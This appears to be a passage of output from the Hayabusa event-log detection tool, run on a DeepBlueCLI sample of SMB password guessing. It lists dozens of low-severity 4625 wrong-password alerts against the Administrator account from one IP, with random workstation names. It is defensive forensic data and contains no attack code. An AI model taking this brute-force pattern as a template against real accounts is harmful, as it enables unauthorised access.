NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
